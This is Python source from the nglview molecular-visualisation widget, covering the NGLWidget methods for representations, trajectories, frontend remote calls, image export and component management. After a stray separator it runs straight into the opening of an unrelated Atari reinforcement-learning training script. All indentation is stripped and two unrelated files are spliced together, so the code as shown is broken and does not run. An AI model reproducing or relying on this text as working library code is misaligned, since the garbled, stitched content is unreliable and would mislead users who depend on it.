self._remote_call_thread = RemoteCallThread(
self,
registered_funcs=['loadFile', 'replaceStructure', '_exportImage'])
self._remote_call_thread.start()
self._trajlist = []
self._ngl_component_ids = []
if representations:
# Must be set here before calling
# add_trajectory or add_struture
# After finish adding new Structure/Trajectory,
# initial representations will be set.
kwargs['default_representation'] = False
else:
if 'default' in kwargs:
kwargs['default_representation'] = kwargs['default']
autoview = 'center' not in kwargs or ('center' in kwargs
and kwargs.pop('center'))
# NOTE: Using `pop` to avoid passing `center` to NGL.
if parameters:
self.parameters = parameters
if isinstance(structure, Trajectory):
name = py_utils.get_name(structure, kwargs)
self.add_trajectory(structure, name=name, **kwargs)
elif isinstance(structure, (list, tuple)):
trajectories = structure
for trajectory in trajectories:
name = py_utils.get_name(trajectory, kwargs)
self.add_trajectory(trajectory, name=name, **kwargs)
else:
if structure is not None:
self.add_structure(structure, **kwargs)
if representations:
# If initial representations are provided,
# we need to set defaultRepresentation to False
self.representations = representations
if autoview:
self.center()
self.player = TrajectoryPlayer(self)
self._view_width = kwargs.get('width', '')
self._view_height = kwargs.get('height', '')
# Updating only self.layout.{width, height} don't handle
# resizing NGL widget properly.
self._sync_with_layout()
# self.layout.width = 'auto'
self._create_player()
self._create_ibtn_fullscreen()
def _create_ibtn_fullscreen(self):
button = widgets.Button(icon='compress')
button.layout.width = '34px'
# onclick is implemented in frontend
self._ibtn_fullscreen = button
def _sync_with_layout(self):
def on_change_layout(change):
new = change['new']
if change['name'] == 'width':
self._set_size(new, '')
elif change['name'] == 'height':
self._set_size('', new)
self.layout.observe(on_change_layout, ['width', 'height'])
def _set_serialization(self, frame_range=None):
self._ngl_serialize = True
resource = self._ngl_coordinate_resource
if frame_range is not None:
for t_index, traj in enumerate(self._trajlist):
resource[t_index] = []
for f_index in range(*frame_range):
if f_index < traj.n_frames:
resource[t_index].append(
encode_base64(traj.get_coordinates(f_index)))
else:
resource[t_index].append(
encode_base64(np.empty((0), dtype='f4')))
resource['n_frames'] = len(resource[0])
self._ngl_coordinate_resource = resource
self._ngl_color_dict = color._USER_COLOR_DICT.copy()
def _create_player(self):
player = Play(max=self.max_frame, interval=100)
slider = IntSlider(max=self.max_frame)
self._iplayer = HBox([player, slider])
self.player.widget_player = player
self.player.widget_player_slider = slider
jslink((player, 'value'), (slider, 'value'))
jslink((player, 'value'), (self, 'frame'))
jslink((player, 'max'), (self, 'max_frame'))
jslink((slider, 'max'), (self, 'max_frame'))
def _unset_serialization(self):
self._ngl_serialize = False
self._ngl_coordinate_resource = {}
@property
def parameters(self):
return self._parameters
@parameters.setter
def parameters(self, params):
params = _camelize_dict(params)
self._parameters = params
self._remote_call('setParameters', target='Widget', args=[
params,
])
@property
def camera(self):
return self._camera_str
@camera.setter
def camera(self, value):
"""
Parameters
----------
value : str, {'perspective', 'orthographic'}
"""
self._camera_str = value
# use _remote_call so this function can be called right after
# self is displayed
self._remote_call("setParameters",
target='Stage',
kwargs=dict(cameraType=self._camera_str))
def _set_camera_orientation(self, arr):
self._remote_call('set_camera_orientation',
target='Widget',
args=[
arr,
])
def _request_stage_parameters(self):
self._remote_call('requestUpdateStageParameters', target='Widget')
@validate('gui_style')
def _validate_gui_style(self, proposal):
val = proposal['value']
if val == 'ngl':
if self._widget_theme is None:
from .theme import ThemeManager
self._widget_theme = ThemeManager()
if self._widget_theme._theme is None:
self._widget_theme.light()
return val
@observe("_gui_theme")
def _on_theme_changed(self, change):
# EXPERIMENTAL
from nglview.theme import theme
if change.new == 'dark':
self._widget_theme.dark()
elif change.new == 'light':
self._widget_theme.light()
@observe('picked')
def _on_picked(self, change):
picked = change['new']
if self.player.widget_picked is not None:
self.player.widget_picked.value = json.dumps(picked)
@observe('background')
def _update_background_color(self, change):
color = change['new']
self.stage.set_parameters(background_color=color)
def handle_resize(self):
# self._remote_call("handleResize", target='Stage')
self._remote_call("handleResize")
@observe('n_components')
def _handle_n_components_changed(self, change):
if self.player.widget_repr is not None:
component_slider = widget_utils.get_widget_by_name(
self.player.widget_repr, 'component_slider')
if change['new'] - 1 >= component_slider.min:
component_slider.max = change['new'] - 1
component_dropdown = widget_utils.get_widget_by_name(
self.player.widget_repr, 'component_dropdown')
component_dropdown.options = tuple(self._ngl_component_names)
if change['new'] == 0:
component_dropdown.options = tuple([' '])
component_dropdown.value = ' '
component_slider.max = 0
reprlist_choices = widget_utils.get_widget_by_name(
self.player.widget_repr, 'reprlist_choices')
reprlist_choices.options = tuple([' '])
repr_slider = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_slider')
repr_slider.max = 0
repr_name_text = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_name_text')
repr_selection = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_selection')
repr_name_text.value = ' '
repr_selection.value = ' '
@observe('_ngl_repr_dict')
def _handle_repr_dict_changed(self, change):
if self.player.widget_repr is not None:
repr_slider = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_slider')
component_slider = widget_utils.get_widget_by_name(
self.player.widget_repr, 'component_slider')
repr_name_text = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_name_text')
repr_selection = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_selection')
reprlist_choices = widget_utils.get_widget_by_name(
self.player.widget_repr, 'reprlist_choices')
repr_names = get_repr_names_from_dict(self._ngl_repr_dict,
component_slider.value)
if change['new'] == {0: {}}:
repr_selection.value = ''
else:
options = tuple(
str(i) + '-' + name for (i, name) in enumerate(repr_names))
reprlist_choices.options = options
try:
value = reprlist_choices.options[repr_slider.value]
if isinstance(value, tuple):
# https://github.com/jupyter-widgets/ipywidgets/issues/1512
value = value[0]
reprlist_choices.value = value
except IndexError:
if repr_slider.value == 0:
# works fine with ipywidgets 5.2.2
reprlist_choices.options = tuple([
' ',
])
reprlist_choices.value = ' '
else:
reprlist_choices.value = reprlist_choices.options[
repr_slider.value - 1]
# e.g: 0-cartoon
repr_name_text.value = reprlist_choices.value.split(
'-')[-1].strip()
repr_slider.max = len(repr_names) - 1 if len(
repr_names) >= 1 else len(repr_names)
def _update_max_frame(self):
self.max_frame = max(
int(traj.n_frames) for traj in self._trajlist
if hasattr(traj, 'n_frames')) - 1 # index starts from 0
def _wait_until_finished(self, timeout=0.0001):
# NGL need to send 'finished' signal to
# backend
self._event.clear()
while True:
# idle to make room for waiting for
# "finished" event sent from JS
time.sleep(timeout)
if self._event.is_set():
# if event is set from another thread
# break while True
break
def _run_on_another_thread(self, func, *args):
# use `event` to singal
# func(*args)
thread = threading.Thread(
target=func,
args=args,
)
thread.daemon = True
thread.start()
return thread
@observe('loaded')
def on_loaded(self, change):
# trick for firefox on Linux
time.sleep(0.1)
if change['new']:
self._fire_callbacks(self._ngl_displayed_callbacks_before_loaded)
def _fire_callbacks(self, callbacks):
def _call(event):
for callback in callbacks:
callback(self)
if callback._method_name == 'loadFile':
self._wait_until_finished()
self._run_on_another_thread(_call, self._event)
def _ipython_display_(self, **kwargs):
super()._ipython_display_(**kwargs)
if self._init_gui:
if self._gui is None:
self._gui = self.player._display()
display(self._gui)
def display(self, gui=False, style='ngl'):
"""
Parameters
----------
gui : bool
If True: turn on GUI
style : str, {'ngl', 'ipywidgets}, default 'ngl'
GUI style (with gui=True)
"""
if gui:
if style == 'ipywidgets':
# For the old implementation
# is there anyone using this?
self.gui_style = None # turn off the NGL's GUI
self._gui = self.player._display()
self._gui.layout.align_self = 'stretch'
self._gui.layout.width = '400px'
b = HBox([self, self._gui])
def on(b):
self.handle_resize()
b.on_displayed(on)
return b
elif style == 'ngl':
self.gui_style = 'ngl'
return self
else:
return self
def _set_size(self, w, h):
'''
Parameters
----------
w, h : float or str
Examples
--------
>>> import nglview; view = nglview.demo()
>>> view._set_size(100, 100)
>>> view._set_size('100px', '100px')
>>> view._set_size('50%', '50%')
'''
self._remote_call('setSize', target='Widget', args=[w, h])
def _set_sync_repr(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_repr_model_ids = sorted(
set(self._synced_repr_model_ids) | model_ids)
self._remote_call("setSyncRepr",
target="Widget",
args=[self._synced_repr_model_ids])
def _set_unsync_repr(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_repr_model_ids = list(set(self._synced_repr_model_ids) - model_ids)
self._remote_call("setSyncRepr",
target="Widget",
args=[self._synced_repr_model_ids])
def _set_sync_camera(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_model_ids = sorted(
set(self._synced_model_ids) | model_ids)
self._remote_call("setSyncCamera",
target="Widget",
args=[self._synced_model_ids])
def _set_unsync_camera(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_model_ids = list(set(self._synced_model_ids) - model_ids)
self._remote_call("setSyncCamera",
target="Widget",
args=[self._synced_model_ids])
def _set_spin(self, axis, angle):
self._remote_call('setSpin', target='Stage', args=[axis, angle])
def _set_selection(self, selection, component=0, repr_index=0):
self._remote_call("setSelection",
target='Representation',
args=[selection],
kwargs=dict(component_index=component,
repr_index=repr_index))
def color_by(self, color_scheme, component=0):
'''update color for all representations of given component
Notes
-----
Unstable feature
Parameters
----------
color_scheme : str
component : int, default 0
component index
Examples
--------
>>> import nglview
>>> view = nglview.demo()
>>> # component 0
>>> view.color_by('atomindex')
>>> # component 1
>>> view.color_by('atomindex', component=1)
'''
repr_names = get_repr_names_from_dict(self._ngl_repr_dict, component)
for index, _ in enumerate(repr_names):
self.update_representation(component=component,
repr_index=index,
color_scheme=color_scheme)
@property
def representations(self):
return self._representations
@representations.setter
def representations(self, reps):
if isinstance(reps, dict):
self._remote_call("_set_representation_from_repr_dict",
args=[reps])
else:
self._representations = reps[:]
for index in range(len(self._ngl_component_ids)):
self.set_representations(reps)
def update_representation(self, component=0, repr_index=0, **parameters):
"""
Parameters
----------
component : int, default 0
component index
repr_index : int, default 0
representation index for given component
parameters : dict
"""
parameters = _camelize_dict(parameters)
kwargs = dict(component_index=component, repr_index=repr_index)
kwargs.update(parameters)
self._remote_call('setParameters',
target='Representation',
kwargs=kwargs)
self._update_repr_dict()
def _update_repr_dict(self):
""" Send a request to fronend to send representation parameters
back.
# TODO: sync or async
"""
self._remote_call('request_repr_dict', target='Widget')
def set_representations(self, representations, component=0):
"""
Parameters
----------
representations : list of dict
"""
self.clear_representations(component=component)
for params in representations:
assert isinstance(params, dict), 'params must be a dict'
kwargs = params['params']
kwargs.update({'component_index': component})
self._remote_call('addRepresentation',
target='compList',
args=[
params['type'],
],
kwargs=kwargs)
def _remove_representation(self, component=0, repr_index=0):
self._remote_call('removeRepresentation',
target='Widget',
args=[component, repr_index])
def _remove_representations_by_name(self, repr_name, component=0):
self._remote_call('removeRepresentationsByName',
target='Widget',
args=[repr_name, component])
def _update_representations_by_name(self, repr_name, component=0,
**kwargs):
kwargs = _camelize_dict(kwargs)
self._remote_call('updateRepresentationsByName',
target='Widget',
args=[repr_name, component],
kwargs=kwargs)
def _display_repr(self, component=0, repr_index=0, name=None):
c = 'c' + str(component)
r = str(repr_index)
try:
name = self._ngl_repr_dict[c][r]['type']
except KeyError:
name = ''
return RepresentationControl(self, component, repr_index, name=name)
def _set_coordinates(self, index, movie_making=False, render_params=None):
# FIXME: use movie_making here seems awkward.
'''update coordinates for all trajectories at index-th frame
'''
render_params = render_params or {}
if self._trajlist:
coordinates_dict = {}
for trajectory in self._trajlist:
traj_index = self._ngl_component_ids.index(trajectory.id)
try:
if trajectory.shown:
if self.player.interpolate:
t = self.player.iparams.get('t', 0.5)
step = self.player.iparams.get('step', 1)
coordinates_dict[traj_index] = interpolate.linear(
index, t=t, traj=trajectory, step=step)
else:
coordinates_dict[
traj_index] = trajectory.get_coordinates(index)
else:
coordinates_dict[traj_index] = np.empty((0),
dtype='f4')
except (IndexError, ValueError):
coordinates_dict[traj_index] = np.empty((0), dtype='f4')
self.set_coordinates(coordinates_dict,
render_params=render_params,
movie_making=movie_making)
else:
print("no trajectory available")
def set_coordinates(self, arr_dict, movie_making=False,
render_params=None):
# type: (Dict[int, np.ndarray]) -> None
"""Used for update coordinates of a given trajectory
>>> # arr: numpy array, ndim=2
>>> # update coordinates of 1st trajectory
>>> view.set_coordinates({0: arr})# doctest: +SKIP
"""
render_params = render_params or {}
self._coordinates_dict = arr_dict
buffers = []
coordinates_meta = dict()
for index, arr in self._coordinates_dict.items():
buffers.append(arr.astype('f4').tobytes())
coordinates_meta[index] = index
msg = {
'type': 'binary_single',
'data': coordinates_meta,
}
if movie_making:
msg['movie_making'] = movie_making
msg['render_params'] = render_params
self.send(
msg,
buffers=buffers)
@observe('frame')
def _on_frame_changed(self, change):
"""set and send coordinates at current frame
"""
self._set_coordinates(self.frame)
def clear(self, *args, **kwargs):
'''shortcut of `clear_representations`
'''
self.clear_representations(*args, **kwargs)
def clear_representations(self, component=0):
'''clear all representations for given component
Parameters
----------
component : int, default 0 (first model)
You need to keep track how many components you added.
'''
self._remote_call("removeAllRepresentations",
target='compList',
kwargs={'component_index': component})
@_update_url
def _add_shape(self, shapes, name='shape'):
"""add shape objects
TODO: update doc, caseless shape keyword
Parameters
----------
shapes : list of tuple
name : str, default 'shape'
name of given shape
Notes
-----
Supported shape: 'mesh', 'sphere', 'ellipsoid', 'cylinder', 'cone', 'arrow'.
See also
--------
{ngl_url}
Examples
--------
>>> import nglview
>>> view = nglview.demo()
>>> sphere = ('sphere', [0, 0, 9], [1, 0, 0], 1.5)
>>> arrow = ('arrow', [1, 2, 7 ], [30, 3, 3], [1, 0, 1], 1.0)
>>> c = view._add_shape([sphere, arrow], name='my_shape')
"""
self._remote_call('addShape', target='Widget', args=[name, shapes], fire_embed=True)
# Added to remain in sync with the JS components
# Similarly to _loadData
cid = str(uuid.uuid4())
self._ngl_component_ids.append(cid)
comp_name = py_utils.get_name(self.shape, {})
self._ngl_component_names.append(comp_name)
self._update_component_auto_completion()
return ComponentViewer(self, cid)
@_update_url
def add_representation(self, repr_type, selection='all', **kwargs):
'''Add structure representation (cartoon, licorice, ...) for given atom selection.
Parameters
----------
repr_type : str
type of representation. Please see {ngl_url} for further info.
selection : str or 1D array (atom indices) or any iterator that returns integer, default 'all'
atom selection
**kwargs: additional arguments for representation
Example
-------
>>> import nglview as nv
>>> import pytraj
>>> t = pytraj.datafiles.load_tz2()
>>> w = nv.show_pytraj(t)
>>> w.add_representation('cartoon', selection='protein', color='blue')
>>> w.add_representation('licorice', selection=[3, 8, 9, 11], color='red')
>>> w # doctest: +SKIP
Notes
-----
User can also use shortcut
>>> selection = 'protein'
>>> w.add_cartoon(selection) # w.add_representation('cartoon', selection)
'''
if repr_type == 'surface':
if 'useWorker' not in kwargs:
kwargs['useWorker'] = False
# avoid space sensitivity
repr_type = repr_type.strip()
# overwrite selection
selection = seq_to_string(selection).strip()
# make copy
kwargs2 = _camelize_dict(kwargs)
if 'component' in kwargs2:
component = kwargs2.pop('component')
else:
component = 0
for k, v in kwargs2.items():
try:
kwargs2[k] = v.strip()
except AttributeError:
# e.g.: opacity=0.4
kwargs2[k] = v
d = {'params': {'sele': selection}}
d['type'] = repr_type
d['params'].update(kwargs2)
params = d['params']
params.update({'component_index': component})
self._remote_call('addRepresentation',
target='compList',
args=[
d['type'],
],
kwargs=params)
@_deprecated("DEPRECATED: Please use 'center' method")
def center_view(self, *args, **kwargs):
"""alias of `center_view`
"""
self.center(*args, **kwargs)
def center(self, selection='*', duration=0, component=0, **kwargs):
"""center view for given atom selection
Examples
--------
view.center_view(selection='1-4')
"""
self._remote_call('autoView',
target='compList',
args=[selection, duration],
kwargs={'component_index': component},
**kwargs)
@observe('_image_data')
def _on_render_image(self, change):
'''update image data to widget_image
Notes
-----
method name might be changed
'''
self._widget_image._b64value = change['new']
def render_image(self,
frame=None,
factor=4,
antialias=True,
trim=False,
transparent=False):
"""render and get image as ipywidgets.widget_image.Image
Parameters
----------
frame : int or None, default None
if None, use current frame
if specified, use this number.
factor : int, default 4
quality of the image, higher is better
antialias : bool, default True
trim : bool, default False
transparent : bool, default False
Examples
--------
# tell NGL to render send image data to notebook.
view.render_image()
# make sure to call `get_image` method
view.get_image()
Notes
-----
You need to call `render_image` and `get_image` in different notebook's Cells
"""
if frame is not None:
self.frame = frame
params = dict(factor=factor,
antialias=antialias,
trim=trim,
transparent=transparent)
iw = Image()
iw.width = '99%' # avoid ugly scroll bar on notebook.
self._remote_call('_exportImage',
target='Widget',
args=[iw.model_id],
kwargs=params)
# iw.value will be updated later after frontend send the image_data back.
return iw
def download_image(self,
filename='screenshot.png',
factor=4,
antialias=True,
trim=False,
transparent=False):
"""render and download scene at current frame
Parameters
----------
filename : str, default 'screenshot.png'
factor : int, default 4
quality of the image, higher is better
antialias : bool, default True
trim : bool, default False
transparent : bool, default False
"""
params = dict(factor=factor,
antialias=antialias,
trim=trim,
transparent=transparent)
self._remote_call('_downloadImage',
target='Widget',
args=[
filename,
],
kwargs=params)
def _ngl_handle_msg(self, widget, msg, buffers):
"""store message sent from Javascript.
How? use view.on_msg(get_msg)
Notes: message format should be {'type': type, 'data': data}
_ngl_handle_msg will call appropriate function to handle message "type"
"""
self._ngl_msg = msg
msg_type = self._ngl_msg.get('type')
if msg_type == 'request_frame':
frame = self.frame + self.player.step
if frame > self.max_frame:
frame = 0
elif frame < 0:
frame = self.max_frame
self.frame = frame
elif msg_type == 'updateIDs':
self._ngl_view_id = msg['data']
elif msg_type == 'removeComponent':
cindex = int(msg['data'])
self._ngl_component_ids.pop(cindex)
elif msg_type == 'repr_parameters':
data_dict = self._ngl_msg.get('data')
name = data_dict.pop('name') + '\n'
selection = data_dict.get('sele', '') + '\n'
# json change True to true
data_dict_json = json.dumps(data_dict).replace(
'true', 'True').replace('false', 'False')
data_dict_json = data_dict_json.replace('null', '"null"')
if self.player.widget_repr is not None:
# TODO: refactor
repr_name_text = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_name_text')
repr_selection = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_selection')
repr_name_text.value = name
repr_selection.value = selection
elif msg_type == 'request_loaded':
if not self.loaded:
# trick to trigger observe loaded
# so two viewers can have the same representations
self.loaded = False
self.loaded = msg.get('data')
elif msg_type == 'request_repr_dict':
# update _repr_dict will trigger other things
# see _handle_repr_dict_changed
self._ngl_repr_dict = self._ngl_msg.get('data')
elif msg_type == 'stage_parameters':
self._ngl_full_stage_parameters = msg.get('data')
elif msg_type == 'async_message':
if msg.get('data') == 'ok':
self._event.set()
elif msg_type == 'image_data':
self._image_data = msg.get('data')
Widget.widgets[msg.get('ID')].value = base64.b64decode(
self._image_data)
def _request_repr_parameters(self, component=0, repr_index=0):
if self.n_components > 0:
self._remote_call('requestReprParameters',
target='Widget',
args=[component, repr_index])
def add_structure(self, structure, **kwargs):
'''add structure to view
Parameters
----------
structure : nglview.Structure object
Examples
--------
>>> view.add_trajectory(traj0) # doctest: +SKIP
... view.add_trajectory(traj1)
... # then add Structure
... view.add_structure(s)
See Also
--------
nglview.NGLWidget.add_component
'''
if not isinstance(structure, Structure):
raise ValueError(f'{structure} is not an instance of Structure')
self._load_data(structure, **kwargs)
self._ngl_component_ids.append(structure.id)
if self.n_components > 1:
self.center_view(component=len(self._ngl_component_ids) - 1)
self._update_component_auto_completion()
return self[-1]
def add_trajectory(self, trajectory, **kwargs):
'''add new trajectory to `view`
Parameters
----------
trajectory: nglview.Trajectory or its derived class or
a supported object, eg pytraj.Trajectory-like,
mdtraj.Trajectory, MDAnalysis objects, etc
See Also
--------
nglview.NGLWidget.add_component
Examples
--------
>>> import nglview as nv, pytraj as pt
>>> traj = pt.load(nv.datafiles.TRR, nv.datafiles.PDB)
>>> view = nv.show_pytraj(traj)
>>> # show view first
>>> view # doctest: +SKIP
>>> # add new Trajectory
>>> traj2 = pt.datafiles.load_tz2()
>>> c = view.add_trajectory(traj2)
'''
backends = BACKENDS
package_name = trajectory.__module__.split('.')[0]
if package_name in backends:
trajectory = backends[package_name](trajectory)
else:
trajectory = trajectory
self._load_data(trajectory, **kwargs)
setattr(trajectory, 'shown', True)
self._trajlist.append(trajectory)
self._update_max_frame()
self._ngl_component_ids.append(trajectory.id)
self._update_component_auto_completion()
return self[-1]
def add_pdbid(self, pdbid, **kwargs):
'''add new Structure view by fetching pdb id from rcsb
Examples
--------
>>> import nglview
>>> view = nglview.NGLWidget()
>>> c = view.add_pdbid('1tsu')
>>> # which is equal to
>>> # view.add_component('rcsb://1tsu.pdb')
'''
return self.add_component(f'rcsb://{pdbid}.pdb', **kwargs)
def add_component(self, filename, **kwargs):
'''add component from file/trajectory/struture
Parameters
----------
filename : str or Trajectory or Structure or their derived class or url
**kwargs : additional arguments, optional
Examples
--------
>>> import nglview
>>> view = nglview.NGLWidget()
>>> view # doctest: +SKIP
... filename = 'somefile.ccp4'
... view.add_component(filename)
Notes
-----
If you want to load binary file such as density data, mmtf format, it is
faster to load file from current or subfolder.
'''
# if passed a supported object, convert "filename" to nglview.Trajectory
try:
package_name = filename.__module__.split('.')[0]
except (TypeError, AttributeError):
# string filename
pass
else:
if package_name in BACKENDS:
filename = BACKENDS[package_name](filename)
self._load_data(filename, **kwargs)
# assign an ID
self._ngl_component_ids.append(str(uuid.uuid4()))
self._update_component_auto_completion()
return self[-1]
def _load_data(self, obj, **kwargs):
'''
Parameters
----------
obj : nglview.Structure or any object having 'get_structure_string' method or
string buffer (open(fn).read())
'''
kwargs2 = _camelize_dict(kwargs)
try:
is_url = FileManager(obj).is_url
except NameError:
is_url = False
if 'defaultRepresentation' not in kwargs2:
kwargs2['defaultRepresentation'] = True
if not is_url:
if hasattr(obj, 'get_structure_string'):
blob = obj.get_structure_string()
kwargs2['ext'] = obj.ext
passing_buffer = True
binary = False
else:
fh = FileManager(obj,
ext=kwargs.get('ext'),
compressed=kwargs.get('compressed'))
# assume passing string
blob = fh.read()
passing_buffer = not fh.use_filename
if fh.ext is None and passing_buffer:
raise ValueError('must provide extension')
kwargs2['ext'] = fh.ext
binary = fh.is_binary
use_filename = fh.use_filename
if binary and not use_filename:
# send base64
blob = base64.b64encode(blob).decode('utf8')
blob_type = 'blob' if passing_buffer else 'path'
args = [{'type': blob_type, 'data': blob, 'binary': binary}]
else:
# is_url
blob_type = 'url'
url = obj
args = [{'type': blob_type, 'data': url, 'binary': False}]
name = py_utils.get_name(obj, kwargs2)
self._ngl_component_names.append(name)
self._remote_call("loadFile",
target='Stage',
args=args,
kwargs=kwargs2)
def remove_component(self, c):
"""remove component by its uuid.
If isinstance(c, ComponentViewer), `c` won't be associated with `self`
Parameters
----------
c : Union[int, ComponentViewer]
Examples
--------
>>> c0 = view.add_trajectory(traj0) # doctest: +SKIP
... c1 = view.add_trajectory(traj1)
... c2 = view.add_struture(structure)
... # remove last component
... view.remove_component(c2)
... assert c2._view is None
"""
if isinstance(c, ComponentViewer):
component_id = c.id
c._view = None
else:
component_id = c
self._clear_component_auto_completion()
if self._trajlist:
for traj in self._trajlist:
if traj.id == component_id:
self._trajlist.remove(traj)
component_index = self._ngl_component_ids.index(component_id)
self._ngl_component_ids.remove(component_id)
self._ngl_component_names.pop(component_index)
self._remote_call('removeComponent',
target='Stage',
args=[
component_index,
])
self._update_component_auto_completion()
def _dry_run(self, func, *args, **kwargs):
return _dry_run(self, func, *args, **kwargs)
def _get_remote_call_msg(self,
method_name,
target='Widget',
args=None,
kwargs=None,
**other_kwargs):
"""call NGL's methods from Python.
Parameters
----------
method_name : str
target : str, {'Stage', 'Viewer', 'compList', 'StructureComponent'}
args : list
kwargs : dict
if target is 'compList', "component_index" could be passed
to specify which component will call the method.
Examples
--------
view._remote_call('loadFile', args=['1L2Y.pdb'],
target='Stage', kwargs={'defaultRepresentation': True})
# perform autoView for 1st component
# JS code
# component = Stage.compList[1];
# component.autoView('*', 200)
# python
view._remote_call('autoView',
target='component',
args=['*', 200],
kwargs={'component_index': 1})
"""
# NOTE: _camelize_dict here?
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
msg = {}
if 'component_index' in kwargs:
msg['component_index'] = kwargs.pop('component_index')
if 'repr_index' in kwargs:
msg['repr_index'] = kwargs.pop('repr_index')
if 'default' in kwargs:
kwargs['defaultRepresentation'] = kwargs.pop('default')
# Color handling
reconstruc_color_scheme = False
if 'color' in kwargs and isinstance(kwargs['color'],
color._ColorScheme):
kwargs['color_label'] = kwargs['color'].data['label']
# overite `color`
kwargs['color'] = kwargs['color'].data['data']
reconstruc_color_scheme = True
if kwargs.get('colorScheme') == 'volume' and kwargs.get('colorVolume'):
assert isinstance(kwargs['colorVolume'], ComponentViewer)
kwargs['colorVolume'] = kwargs['colorVolume']._index
msg['target'] = target
msg['type'] = 'call_method'
msg['methodName'] = method_name
msg['reconstruc_color_scheme'] = reconstruc_color_scheme
msg['args'] = args
msg['kwargs'] = kwargs
if other_kwargs:
msg.update(other_kwargs)
return msg
def _trim_message(self, messages):
messages = messages[:]
remove_comps = [(index, msg['args'][0])
for index, msg in enumerate(messages)
if msg['methodName'] == 'removeComponent']
if not remove_comps:
return messages
load_comps = [
index for index, msg in enumerate(messages)
if msg['methodName'] in ('loadFile', 'addShape')
]
messages_rm = [r[0] for r in remove_comps]
messages_rm += [load_comps[r[1]] for r in remove_comps]
messages_rm = set(messages_rm)
return [
msg for i, msg in enumerate(messages)
if i not in messages_rm
]
def _remote_call(self,
method_name,
target='Widget',
args=None,
kwargs=None,
**other_kwargs):
msg = self._get_remote_call_msg(method_name,
target=target,
args=args,
kwargs=kwargs,
**other_kwargs)
def callback(widget, msg=msg):
widget.send(msg)
callback._method_name = method_name
callback._ngl_msg = msg
if self.loaded:
self._remote_call_thread.q.append(callback)
else:
# send later
# all callbacks will be called right after widget is loaded
self._ngl_displayed_callbacks_before_loaded.append(callback)
if callback._method_name not in _EXCLUDED_CALLBACK_AFTER_FIRING and \
(not other_kwargs.get("fire_once", False)):
archive = self._ngl_msg_archive[:]
archive.append(msg)
self._ngl_msg_archive = self._trim_message(archive)
def _get_traj_by_id(self, itsid):
"""return nglview.Trajectory or its derived class object
"""
for traj in self._trajlist:
if traj.id == itsid:
return traj
return None
def hide(self, indices):
"""set invisibility for given component/struture/trajectory (by their indices)
"""
traj_ids = {traj.id for traj in self._trajlist}
for index in indices:
comp_id = self._ngl_component_ids[index]
if comp_id in traj_ids:
traj = self._get_traj_by_id(comp_id)
traj.shown = False
self._remote_call("setVisibility",
target='compList',
args=[
False,
],
kwargs={'component_index': index})
def show(self, **kwargs):
"""shortcut of `show_only`
"""
self.show_only(**kwargs)
def show_only(self, indices='all', **kwargs):
"""set visibility for given components (by their indices)
Parameters
----------
indices : {'all', array-like}, component index, default 'all'
"""
traj_ids = {traj.id for traj in self._trajlist}
if indices == 'all':
indices_ = set(range(self.n_components))
else:
indices_ = set(indices)
for index, comp_id in enumerate(self._ngl_component_ids):
if comp_id in traj_ids:
traj = self._get_traj_by_id(comp_id)
else:
traj = None
if index in indices_:
args = [
True,
]
if traj is not None:
traj.shown = True
else:
args = [
False,
]
if traj is not None:
traj.shown = False
self._remote_call("setVisibility",
target='compList',
args=args,
kwargs={'component_index': index},
**kwargs)
def _js_console(self):
self.send(dict(type='get', data='any'))
def _get_full_params(self):
self.send(dict(type='get', data='parameters'))
def _display_image(self):
'''for testing
'''
from IPython import display
im_bytes = base64.b64decode(self._image_data)
return display.Image(im_bytes)
def _clear_component_auto_completion(self):
for index, _ in enumerate(self._ngl_component_ids):
name = 'component_' + str(index)
delattr(self, name)
def _js(self, code, **kwargs):
self._execute_js_code(code, **kwargs)
def _execute_js_code(self, code, **kwargs):
self._remote_call('executeCode',
target='Widget',
args=[code],
**kwargs)
def _update_component_auto_completion(self):
trajids = [traj.id for traj in self._trajlist]
for index, cid in enumerate(self._ngl_component_ids):
comp = ComponentViewer(self, cid)
name = 'component_' + str(index)
setattr(self, name, comp)
if cid in trajids:
traj_name = 'trajectory_' + str(trajids.index(cid))
setattr(self, traj_name, comp)
def __getitem__(self, index):
"""return ComponentViewer
"""
postive_index = py_utils.get_positive_index(
index, len(self._ngl_component_ids))
return ComponentViewer(self, self._ngl_component_ids[postive_index])
def __iter__(self):
"""return ComponentViewer
"""
for i, _ in enumerate(self._ngl_component_ids):
yield self[i]
class Fullscreen(DOMWidget):
"""EXPERIMENTAL
"""
_view_name = Unicode("FullscreenView").tag(sync=True)
_view_module = Unicode("nglview-js-widgets").tag(sync=True)
_view_module_version = Unicode(__frontend_version__).tag(sync=True)
_model_name = Unicode("FullscreenModel").tag(sync=True)
_model_module = Unicode("nglview-js-widgets").tag(sync=True)
_model_module_version = Unicode(__frontend_version__).tag(sync=True)
_is_fullscreen = Bool().tag(sync=True)
def __init__(self, target, views):
super().__init__()
self._target = target
self._views = views
def fullscreen(self):
self._js("this.fullscreen('%s')" % self._target.model_id)
def _js(self, code):
msg = {"executeCode": code}
self.send(msg)
@observe('_is_fullscreen')
def _fullscreen_changed(self, change):
if not change.new:
self._target.layout.height = '300px'
self.handle_resize()
def handle_resize(self):
for v in self._views:
v.handle_resize()
|
simple_train.py | import utils.atari_wrapper as atari_wrapper
from utils.multi import create_buffers, get_batch, act
import torch.multiprocessing as mp
# from utils
import argparse
from model.atari_impala import AtariCasaNet
import logging
import torch
import time
import timeit
import os
import utils.some_trace as some_trace
import utils.some_loss as some_loss
import threading
import pprint
from utils import file_writer,prof
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
def create_env(name):
return atari_wrapper.wrap_pytorch(
atari_wrapper.wrap_deepmind(
atari_wrapper.make_atari_by_id(name), # PongNoFrameskip-v0
clip_rewards=False,
frame_stack=True,
scale=False
)
)
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
parser.add_argument("--env", type=str, default="PongNoFrameskip-v4",
help="Gym environment.")
